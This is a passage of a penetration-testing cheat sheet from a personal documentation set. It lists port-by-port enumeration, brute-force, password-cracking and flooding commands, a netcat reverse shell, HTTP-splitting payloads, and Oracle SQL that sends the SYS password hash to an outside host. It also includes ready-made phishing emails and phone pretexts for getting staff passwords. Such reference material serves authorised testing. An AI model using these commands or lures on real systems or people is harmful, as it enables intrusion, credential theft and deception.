Neohapsis Atttack Box: nc -l -p Port -vvv Victim: $ exec 0&0 # Next we copy stdin to stdout Victim: $ exec 2>&0 # And finally stdin to stderr Victim: $ exec /bin/sh 0&0 2>&0 Method Testing nc IP_Adress Port HEAD / HTTP/1.0 OPTIONS / HTTP/1.0 PROPFIND / HTTP/1.0 TRACE / HTTP/1.1 PUT http://Target_URL/FILE_NAME POST http: //Target_URL/FILE_NAME HTTP/1.x Upload Files curl curl -u -T file_to_upload curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” put.pl put.pl -h target -r /remote_file_name -f local_file_name webdav cadaver View Page Source Hidden Values Developer Remarks Extraneous Code Passwords! Input Validation Checks NULL or null Possible error messages returned. ‘ , ” , ; , Used to find command execution vulnerabilities. “> Basic Cross-Site Scripting Checks. %0d%0a Carriage Return (%0d) Line Feed (%0a) HTTP Splitting language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47blah Cache Poisoning language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent- Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent- Length:%2047%0d%0a%0d%0aInsert undesireable content here %7f , %ff byte-length overflows; maximum 7- and 8-bit values. -1, other Integer and underflow vulnerabilities. %n , %x , %s Testing for format string vulnerabilities. ../ Directory Traversal Vulnerabilities. % , _, * Wildcard characters can sometimes present DoS issues or information dis- closure. Ax1024+ Overflow vulnerabilities.

348 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

Automated table and column iteration orderby.py ./orderby.py www.site.com/index.php?id= d3sqlfuzz.py ./d3sqlfuzz.py www.site.com/index.php?id=- 1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE– Vulnerability Scanners Acunetix Grendelscan NStealth Obiwan III w3af Specific Applications/ Server Tools Domino dominoaudit dominoaudit.pl [options] -h Joomla cms_few ./cms.py joomsq ./joomsq.py joomlascan ./joomlascan.py [options i.e. -p/-proxy : Add proxy support -404 : Don’t show 404 responses] joomscan ./joomscan.py -u “www.site.com/joomladir/” -o site.txt -p 127.0.0.1:80 jscan jscan.pl -f hostname (shell.txt required) aspaudit.pl asp-audit.pl http://target/app/filename.aspx (options i.e. -bf) Vbulletin vbscan.py vbscan.py -v vbscan.py -update ZyXel zyxel-bf.sh snmpwalk snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2 snmpget snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0 Proxy Testing Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab Examine configuration files Generic Examine httpd.conf/ windows config files JBoss JMX Console http://:8080/jmxconcole/ War File Joomla configuration.php diagnostics.php joomla.inc.php config.inc.php Mambo configuration.php config.inc.php Wordpress setup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /Rem- MagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups

48.3. Penetration 349 Omid Raha MyStack Documentation, Release 0.1

/RestoreCfg.html /BackupCfg.html Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings ZyXEL Config Reader Examine web server logs c:winntsystem32LogfilesW3SVC1 awk -F ” ” ‘{print $3,$11} filename | sort | uniq References White Papers Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet Books Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker’s Handbook Exploit Frameworks Brute-force Tools Acunetix Metasploit w3af Portmapper port 111 open rpcdump.py rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP) rpcinfo rpcinfo [options] IP_Address NTP Port 123 open NTP Enumeration ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq host hostname ntpversion readlist version Examine configuration files ntp.conf NetBIOS Ports 135-139,445 open NetBIOS enumeration Enum enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> Null Session net use \192.168.1.1ipc$ “” /u:”“ net view \ip_address Dumpsec Smbclient smbclient -L //server/share password options Superscan Enumeration tab. user2sid/sid2user Winfo NetBIOS brute force Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool) Examine Configuration Files Smb.conf lmhosts SNMP port 161 open Default Community Strings public private cisco cable-docsis ILMI MIB enumeration

350 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

Windows NT .1.3.6.1.2.1.1.5 Hostnames .1.3.6.1.4.1.77.1.4.2 Domain Name .1.3.6.1.4.1.77.1.2.25 Usernames .1.3.6.1.4.1.77.1.2.3.1.1 Running Services .1.3.6.1.4.1.77.1.2.27 Share Information Solarwinds MIB walk Getif snmpwalk snmpwalk -v -c Snscan Applications ZyXel snmpget -v2c -c 1.3.6.1.4.1.890.1.2.1.2.6.0 snmpwalk -v2c -c 1.3.6.1.4.1.890.1.2.1.2 SNMP Bruteforce onesixtyone onesixytone -c SNMP.wordlist cat ./cat -h -w SNMP.wordlist Solarwinds SNMP Brute Force ADMsnmp Examine SNMP Configuration files snmp.conf snmpd.conf snmp-config.xml LDAP Port 389 Open ldap enumeration ldapminer ldapminer -h ip_address -p port (not required if default) -d luma Gui based tool ldp Gui based tool openldap ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d de- buglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H lda- puri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [- U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs. . . ] lda- padd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][- y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][- K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][- H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][- n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][- R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][- c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][- x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn] ldap brute force bf_ldap bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l pass- words list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,) K0ldS LDAP_Brute.pl Examine Configuration Files General containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf

48.3. Penetration 351 Omid Raha MyStack Documentation, Release 0.1

IBM SecureWay V3 server V3.sas.oc Microsoft Active Directory server msadClassesAttrs.ldif Netscape Directory Server 4 nsslapd.sas_at.conf nsslapd.sas_oc.conf OpenLDAP directory server slapd.sas_at.conf slapd.sas_oc.conf Sun ONE Directory Server 5.1 75sas.ldif PPTP/L2TP/VPN port 500/1723 open Enumeration ike-scan ike-probe Brute-Force ike-crack Reference Material PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation Modbus port 502 open modscan rlogin port 513 open Rlogin Enumeration Find the files find / -name .rhosts locate .rhosts Examine Files cat .rhosts Manual Login rlogin hostname -l username rlogin Subvert the files echo ++ > .rhosts Rlogin Brute force Hydra rsh port 514 open Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command Rsh Brute Force rsh-grind Hydra medusa SQL Server Port 1433 1434 open SQL Enumeration piggy SQLPing sqlping ip_address/hostname SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver SQL Brute Force SQLPAT sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack SQL Dict SQLAT Hydra SQLlhf ForceSQL Citrix port 1494 open Citrix Enumeration Default Domain Published Applications ./citrix-pa-scan {IP_address/file | - | random} [timeout] citrix-pa-proxy.pl IP_to_proxy_to [Local_IP] Citrix Brute Force bforce.js connect.js Citrix Brute-forcer Reference Material Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way Oracle Port 1521 Open Oracle Enumeration oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration

352 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ER- NAME=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL SQL> select utl_http.request(‘http://gladius:5500/’||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME=’SYS’)) from dual; WinSID Oracle default password list TNSVer tnsver host [port] TCP Scan Oracle TNSLSNR Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop] TNSCmd perl tnscmd.pl -h ip_address perl tnscmd.pl version -h ip_address perl tnscmd.pl status -h ip_address perl tnscmd.pl -h ip_address –cmdsize (40 - 200) LSNrCheck Oracle Security Check (needs credentials) OAT sh opwg.sh -s ip_address opwg.bat -s ip_address sh oquery.sh -s ip_address -u username -p password -d SID OR c:oquery -s ip_address -u username -p pass- word -d SID OScanner sh oscanner.sh -s ip_address oscanner.exe -s ip_address sh reportviewer.sh oscan- ner_saved_file.xml reportviewer.exe oscanner_saved_file.xml NGS Squirrel for Oracle Service Register Service-register.exe ip_address PLSQL Scanner 2008 Oracle Brute Force OAK ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid user- name password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port breakable (Targets Application Server Port) breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose SQLInjector (Targets Application Server Port) sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle Check Password orabf orabf [hash]:[username] [options] thc-orakel Cracker Client Crypto DBVisualisor Sql scripts from pentest.co.uk Manual sql input of previously reported vul- nerabilties Oracle Reference Material Understanding SQL Injection SQL Injection walkthrough SQL In- jection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets

48.3. Penetration 353 Omid Raha MyStack Documentation, Release 0.1

http://ha.ckers.org/sqlinjection http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ http://www.0x000000.com/?i=14 http://pentestmonkey.net/ NFS Port 2049 open NFS Enumeration showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point NFS Brute Force Interact with NFS share and try to add/delete Exploit and Confuse Unix Examine Configuration Files /etc/exports /etc/lib/nfs/xtab Compaq/HP Insight Manager Port 2301,2381open HP Enumeration Authentication Method Host OS Authentication Default Authentication Default Passwords Wikto Nstealth HP Bruteforce Hydra Acunetix Examine Configuration Files path.properties mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc MySQL port 3306 open Enumeration nmap -A -n -p3306 nmap -A -n -PN –script:ALL -p3306 telnet IP_Address 3306 use test; select * from test; To check for other DB’s – show databases Administration MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog Manual Checks Default usernames and passwords username: root password: testing mysql -h -u root mysql -h -u root mysql -h -u root@localhost mysql -h mysql -h -u “”@localhost Configuration Files Operating System windows config.ini my.ini windowsmy.ini winntmy.ini /mysql/data/ unix my.cnf /etc/my.cnf /etc/mysql/my.cnf /var/lib/mysql/my.cnf ~/.my.cnf /etc/my.cnf Command History ~/.mysql.history Log Files connections.log update.log common.log To run many sql commands at once – mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf)

354 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

Parent dir = data directory mysql test information_schema (Key information in MySQL) Complete table list – select table_schema,table_name from tables; Exact privileges – select grantee, table_schema, privilege_type FROM schema_privileges; File privileges – select user,file_priv from mysql.user where user=’root’; Version – select version(); Load a specific file – SELECT LOAD_FILE(‘FILENAME’); SSL Check mysql> show variables like ‘have_openssl’; If there’s no rows returned at all it means the the distro itself doesn’t support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn’t started with ssl and can be easily fixed. Privilege Escalation Current Level of access mysql>select user(); mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user=’OUTPUT OF select user()’; Access passwords mysql> use mysql mysql> select user,password from user; Create a new user and grant him privileges mysql>create user test identified by ‘test’; mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on . to mysql identified by ‘mysql’ WITH GRANT OPTION; Break into a shell mysql> ! cat /etc/passwd mysql> ! bash SQL injection mysql-miner.pl mysql-miner.pl http://target/ expected_string database http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html http: //www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/ References. Design Weaknesses MySQL running as root Exposed publicly on Internet http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql http://search.securityfocus.com/ swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0 RDesktop port 3389 open Rdesktop Enumeration Remote Desktop Connection Rdestop Bruteforce TSGrinder tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address Tscrack Sybase Port 5000+ open Sybase Enumeration sybase-version ip_address from NGS Sybase Vulnerability Assessment Use DBVisualiser Sybase Security checksheet Copy output into excel spreadsheet Evaluate mis- configured parameters

48.3. Penetration 355 Omid Raha MyStack Documentation, Release 0.1

Manual sql input of previously reported vulnerabilties Advanced SQL Injection in SQL Server More Advanced SQL Injection NGS Squirrel for Sybase SIP Port 5060 open SIP Enumeration netcat nc IP_Address Port sipflanker python sipflanker.py 192.168.1-254 Sipscan smap smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address SIP Packet Crafting etc. sipsak Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain siprogue SIP Vulnerability Scanning/ Brute Force tftp bruteforcer Default dictionary file ./tftpbrute.pl IP_Address Dictionary_file Maxi- mum_Processes VoIPaudit SiVuS Examine Configuration Files SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf .cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc. VNC port 5900^ open VNC Enumeration Scans 5900^ for direct access.5800 for HTTP access. VNC Brute Force Password Attacks Remote Password Guess vncrack Password Crack vncrack Packet Capture Phosshttp://www.phenoelit.de/phoss Local Registry Locations HKEY_CURRENT_USERSoftwareORLWinVNC3 HKEY_USERS.DEFAULTSoftwareORLWinVNC3 Decryption Key 0x238210763578887 Exmine Configuration Files .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf X11 port 6000^ open X11 Enumeration List open windows Authentication Method Xauth Xhost

356 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

X11 Exploitation xwd xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm Keystrokes Received Transmitted Screenshots xhost + Examine Configuration Files /etc/Xn.hosts /usr/lib/X11/xdm Search through all files for the command “xhost +” or “/usr/bin/X11/xhost +” /usr/lib/X11/xdm/xsession /usr/lib/X11/xdm/xsession-remote /usr/lib/X11/xdm/xsession.0 /usr/lib/X11/xdm/xdm-config DisplayManager*authorize:on Port 9001, 9030 open Tor Node Checker Ip Pages Kewlio.net nmap NSE script Jet Direct 9100 open hijetta Network Footprinting Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as pos- sible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack. Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.

Authoratitive Bodies IANA - Internet Assigned Numbers Authority ICANN - Inter- net Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry AFRINIC - African Network Information Centre APNIC - Asia Pa- cific Network Information Centre National Internet Registry APJII CNNIC JPNIC KRNIC TWNIC VNNIC ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre Websites Central Ops Domain Dossier Email Dossier DNS Stuff Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries. Fixed Orbit Autonomous System lookups and other online tools available. Geektools IP2Location Allows limited free IP lookups to be performed, displaying geoloca- tion information, ISP details and other pertinent information.

48.3. Penetration 357 Omid Raha MyStack Documentation, Release 0.1

Kartoo Metasearch engine that visually presents its results. MyIPNeighbors.com Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution Netcraft Online search tool allowing queries for host information. Robtex Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify) Traceroute.org Website listing a large number links to online traceroute re- sources. Wayback Machine Stores older versions of websites, making it a good com- parison tool and excellent resource for previously removed data. Whois.net Tools Cheops-ng Country whois Domain Research Tool Firefox Plugins AS Number Shazou Firecat Suite Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot Internet Search General Information Web Investigator Tracesmart Friends Reunited Ebay - profiles etc. Financial EDGAR - Company information, including real-time filings. US - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK Phone book/ Electoral Role Information 123people http://www.123people.co.uk/s/firstname+lastname/world 192.com Electoral Role Search. UK 411 Online White Pages and Yellow Pages. US Abika Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US BT.com. UK Residential Business Pipl http://pipl.com/search/?FirstName=????&LastName=????&City=&State=&Country=UK&CategoryID=2&Interface=1 http://pipl.com/search/?Email=john%40example.com& CategoryID=4&Interface=1 http://pipl.com/search/ ?Username=????&CategoryID=5&Interface=1 Spokeo http://www.spokeo.com/user?q=domain_name http://www.spokeo. com/user?q=email_address Yasni http://www.yasni.co.uk/index.php?action=search&search=1&sh= &name=firstname+lastname&filter=Keyword Zabasearch People Search Engine. US Generic Web Searching Code Search Forum Entries Database Google

358 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

Back end files .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf Email Addresses Contact Details Newsgroups/forums Blog Search Yammer http://blogsearch.google.com/blogsearch?hl=en&ie= UTF-8&q=????&btnG=Search+Blogs Technorati http://technorati.com/search/{[}query]?language=n Present.ly Twitter Network Browser Search Engine Comparison/ Aggregator Sites Clusty http://clusty.com/search?input-form=clusty-simple&v% 3Asources=webplus&query=???? Grokker http://live.grokker.com/grokker.html? query=?????&OpenSearch_Yahoo=true&Wikipedia=true&numResults=250 Zuula http://www.zuula.com/SearchResult.jsp?bst=1&prefpg=1& st=????&x=0&y=0 Exalead http://www.exalead.co.uk/search/results? q=????&x=0&y=0&%24mode=allweb&%24searchlanguages=en Delicious http://delicious.com/search?p=?????&u=&chk=&context=&fr=del_icio_us&lc=0 Metadata Search Metadata can be found within various file formats. Dependant on the file types to be inspected, the more metadata can be extracted. Example metadata that can be extracted includes valid usernames, directory structures etc. make the review of documents/ images etc. relating to the target domain a valuable source of information.

MetaData Visualisation Sites TouchGraph Google Browser Kar- too Tools Bashitsu svn checkout http://bashitsu.googlecode.com/svn/ trunk/ cat filename | strings | bashitsu-extract-names Bintext Exif Tool exiftool -common directory exiftool -r -w .txt -common directory FOCA Online Version Offline Hachoir Infocrobes Libextractor extract -b filename extract filename extract -B coun- try_code filename Metadata Extraction Tool extract.bat Metagoofil metagoofil -d target_domain -l max_no_of_files -f all ( or pdf,doc,xls,ppt) -o output_file.html -t direc- tory_to_download_files_to OOMetaExtractor The Revisionist

48.3. Penetration 359 Omid Raha MyStack Documentation, Release 0.1

./therev ‘’ @/directory ./therev ‘’ site.com ./therev ‘linux’ microsoft.com en Wvware Wikipedia Metadata Search Wikiscanner Wikipedia username checker Social/ Business Networks The following sites are some of many social and business related network- ing entities that are in use today. Dependant on the interests of the people you are researching it may be worth just exploring sites that they have a particular penchant based on prior knowledge from open source research, company biographies etc. i.e. Buzznet if they are interested in music/ pop culture, Flixter for movies etc. Finding a persons particular interests may make a potential client side attack more successful if you can find a related “hook” in any potential “spoofed” email sent for them to click on (A Spearphishing technique) Note: - This list is not exhaustive and has been limited to those with over 1 million members.

Africa BlackPlanet Australia Bebo Belgium Netlog Holland Hyves Hungary iWiW Iran Cloob Japan Mixi Korea CyWorld Poland Grono Nasza-klasa Russia Odnoklassniki Vkontakte Sweden LunarStorm UK FriendsReunited et al Badoo FaceParty US Classmates Facebook Friendster MyLife.com (formerly Re- union.com) MySpace Windows Live Spaces Assorted Buzznet Care2 Habbo Hi5 Linkedin MocoSpace Naymz Passado Tagged Twitter Windows Live Spaces Xanga Ya- hoo! 360° Xing http://www.xing.com/app/search?op=universal& universal=???? Resources OSINT International Directory of Search Engines DNS Record Retrieval from publically available servers Types of Information Records SOA Records - Indicates the server that has author- ity for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records

360 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

- An address record that allows a computer name to be translated to an IP ad- dress. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host infor- mation record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain. Database Settings Version.bind Serial Refresh Retry Expiry Minimum Sub Domains Internal IP ranges Reverse DNS for IP Range Zone Transfer Social Engineering Remote Phone Scenarios IT Department.”Hi, it’s Zoe from the helpdesk. I am doing a security audit of the networkand I need to re-synchronise the Active Directory usernames and passwords.This is so that your logon process in the morning receives no undue delays”If you are calling from a mo- bile number, explain that the helpdesk has beenissued a mobile phone for ‘on call’ personnel. Results Contact Details Name Phone number Email Room number Department Role Email Scenarios Hi there, I am currently carrying out an Active Directory Health Checkfor TARGET COMPANY and require to re-synchronise some outstandingaccounts on behalf of the IT Service Desk. Please reply to medetailing the username and password you use to logon to your desktopin the morning. I have checked with MR JOHN DOE, the IT SecurityAdvisor and he has authorised this request. I will then popu- late thedatabase with your account details ready for re-synchronisation withActive Directory such that replication of your account will bere- established (this process is transparent to the user and sorequires no further action from yourself). We hope that this exercisewill reduce the time it takes for some users to logon to the network.Best Regards, An- drew Marks Good Morning,The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this ‘opportunity’ to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.If you wish to retain your current creden- tials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for

48.3. Penetration 361 Omid Raha MyStack Documentation, Release 0.1

your continued patience and help.Kindest regards,leeEMAIL SIGNA- TURE Software Results Contact Details Name Phone number Email Room number Department Role Other Local Personas Name Suggest same 1st name. Phone Give work mobile, but remember they have it! Email Have a suitable email address Business Cards Get cards printed Contact Details Name Phone number Email Room number Department Role Scenarios New IT employee New IT employee.”Hi, I’m the new guy in IT and I’ve been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don’t they? Can you help me out on this?”Get the following information, try to put a “any prob- lems with it we can help with?” slant on it.UsernameDomainRemote access (Type - Modem/VPN)Remote email (OWA)Most used soft- ware?Any comments about the network?Any additional software you would like?What do you think about the security on the network? Password complexity etc.Now give reasons as to why they have com- plexity for passwords, try and get someone to give you their password and explain how you can make it more secure.”Thanks very much and you’ll see the results on the company boards soon.” Fire Inspector Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the work- place.Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake).Check for:number of fire extinguishers, pressure, type.Fire exits, accessibility etc.Look for any information you can get. Try to get on your own, without supervision! Results Maps Satalitte Imagery Building layouts Other Dumpster Diving Rubbish Bins Contract Waste Removal Ebay ex-stock sales i.e. HDD Web Site copy htttrack teleport pro Black Widow Password cracking Rainbow crack ophcrack rainbow tables rcrack c:rainbowcrack*.rt -f pwfile.txt Ophcrack Cain & Abel John the Ripper

362 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

./unshadow passwd shadow > file_to_crack ./john -single file_to_crack ./john - w=location_of_dictionary_file -rules file_to_crack ./john -show file_to_crack ./john –incre- mental:All file_to_crack fgdump fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt pwdump6 pwdump [-h][-o][-u][-p] machineName medusa LCP L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada Domain credentials Sniffing pwdump import sam import aiocracker aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list VoIP Security Sniffing Tools AuthTool Cain & Abel Etherpeek NetDude Oreka PSIPDump SIPomatic SIPv6 Analyzer UCSniff VoiPong VOMIT Wireshark WIST - Web Interface for SIP Trace Scanning and Enumeration Tools enumIAX fping IAX Enumerator iWar Nessus Nmap SIP Forum Test Framework (SFTF) SIPcrack sipflanker python sipflanker.py 192.168.1-254 SIP-Scan SIP.Tastic SIPVicious SiVuS SMAP smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address snmpwalk VLANping VoIPAudit VoIP GHDB Entries VoIP Voicemail Database Packet Creation and Flooding Tools H.323 Injection Files H225regreject IAXHangup IAXAuthJack IAX.Brute IAXFlooder ./iaxflood sourcename destinationname numpackets INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets kphone-ddos RTP Flooder rtpbreak Scapy Seagull SIPBomber SIPNess SIPp SIPsak Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain SIP-Send-Fun SIPVicious Spitter TFTP Brute Force perl tftpbrute.pl <filelist> UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets Voiphopper Fuzzing Tools Asteroid Codenomicon VoIP Fuzzers Fuzzy Packet Mu Security VoIP Fuzzing Platform ohrwurm RTP Fuzzer PROTOS H.323 Fuzzer PROTOS SIP Fuzzer SIP Forum Test Framework (SFTF) Sip-Proxy Spirent ThreatEx Signaling Manipulation Tools AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v BYE Teardown Check Sync Phone Rebooter RedirectPoison

48.3. Penetration 363 Omid Raha MyStack Documentation, Release 0.1

